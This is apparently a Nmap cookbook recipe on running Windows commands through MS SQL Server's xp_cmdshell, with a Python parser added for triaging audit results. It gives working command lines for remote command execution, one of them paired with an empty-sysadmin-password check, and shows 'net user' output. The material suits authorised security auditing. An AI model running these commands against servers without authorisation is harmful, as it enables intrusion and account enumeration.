MS SQL servers have a stored procedure called xp_cmdshell. This feature allows programmers to execute commands through the MS SQL server. Nmap helps us execute custom shell commands when this option is enabled.
This recipe shows how to run Windows commands through MS SQL servers by using Nmap.
Open your terminal and enter the following Nmap command:
$ nmap --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>
The results will be included in the script output section:
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2011 11.00.1750.00
| ms-sql-xp-cmdshell:
|   [192.168.1.102:1433]
|     Command: net user
|     output
|     ======
|
|     User accounts for \
|
|     -------------------------------------------------------------------------------
|     Administrator            cldrn                    Guest
|     postgres
|     The command completed with one or more errors.
|
|_
MS SQL servers usually run on TCP port 1433. The arguments --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 make Nmap run the script ms-sql-xp-cmdshell against port 1433 and set the credentials it authenticates with if an MS SQL server is found there.
The script ms-sql-xp-cmdshell was written by Patrik Karlsson. It attempts to run an OS command through the stored procedure xp_cmdshell found on MS SQL servers. This script depends on the mssql library; its documentation can be found at http://nmap.org/nsedoc/lib/mssql.html.
By default, ms-sql-xp-cmdshell will attempt to run the command ipconfig /all, but you can specify a different one by using the script argument ms-sql-xp-cmdshell.cmd:
$ nmap --script-args 'ms-sql-xp-cmdshell.cmd="<command>",mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>
If the server does not have the xp_cmdshell procedure enabled, you should see the following message:
| ms-sql-xp-cmdshell:
|   (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
|   [192.168.1.102\MSSQLSERVER]
|_    Procedure xp_cmdshell disabled. For more information see "Surface Area Configuration" in Books Online.
If you did not provide any valid credentials for authentication, the following message will be displayed:
| ms-sql-xp-cmdshell:
|   [192.168.1.102:1433]
|_  ERROR: No login credentials.
Remember that you can use this script in combination with ms-sql-empty-password to automatically retrieve the network configuration of an MS SQL server that has a sysadmin account with an empty password:
$ nmap --script ms-sql-xp-cmdshell,ms-sql-empty-password -p1433 <target>
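When this recipe is run across many hosts in an audit, the script output has to be triaged. The following Python script is an added example, not part of the recipe or of Nmap: it parses normal (-oN) Nmap output and classifies each ms-sql-xp-cmdshell block as executed, disabled or no_credentials, based on the three result variants shown above. The sample output embedded in it is constructed for this example.

```python
import re
# Constructed -oN sample covering the three result variants shown in the recipe.
SAMPLE_OUTPUT = r"""Nmap scan report for 192.168.1.102
| ms-sql-xp-cmdshell:
|   [192.168.1.102:1433]
|     Command: net user
|_    Administrator            cldrn                    Guest
Nmap scan report for 192.168.1.103
| ms-sql-xp-cmdshell:
|   [192.168.1.103\MSSQLSERVER]
|_    Procedure xp_cmdshell disabled. For more information see "Surface Area Configuration" in Books Online.
Nmap scan report for 192.168.1.104
| ms-sql-xp-cmdshell:
|   [192.168.1.104:1433]
|_  ERROR: No login credentials.
"""
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
INSTANCE_RE = re.compile(r"^\|\s+\[([^\]]+)\]")   # [host:port] or [host\instance]
COMMAND_RE = re.compile(r"^\|\s+Command: (.+)$")

def parse_xp_cmdshell(text):
    """Return one dict per ms-sql-xp-cmdshell block (status: executed,
    disabled, no_credentials or unknown); a block ends at the '|_' line."""
    results, host, cur = [], "?", None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
        elif line.startswith("| ms-sql-xp-cmdshell:"):
            cur = {"host": host, "instance": "", "status": "unknown", "command": ""}
        elif cur is not None:
            m = INSTANCE_RE.match(line)
            if m and not cur["instance"]:
                cur["instance"] = m.group(1)
            m = COMMAND_RE.match(line)
            if m:
                cur["status"], cur["command"] = "executed", m.group(1).strip()
            elif "Procedure xp_cmdshell disabled" in line:
                cur["status"] = "disabled"
            elif "No login credentials" in line:
                cur["status"] = "no_credentials"
            if line.startswith("|_"):
                results.append(cur)
                cur = None
    return results

def hosts_with_xp_cmdshell_enabled(text):
    """Hosts where the supplied credentials actually ran an OS command."""
    return [r["host"] for r in parse_xp_cmdshell(text) if r["status"] == "executed"]
```

Hosts reported as executed are the ones where xp_cmdshell is enabled and reachable with the tested account, so they are the first to review and harden.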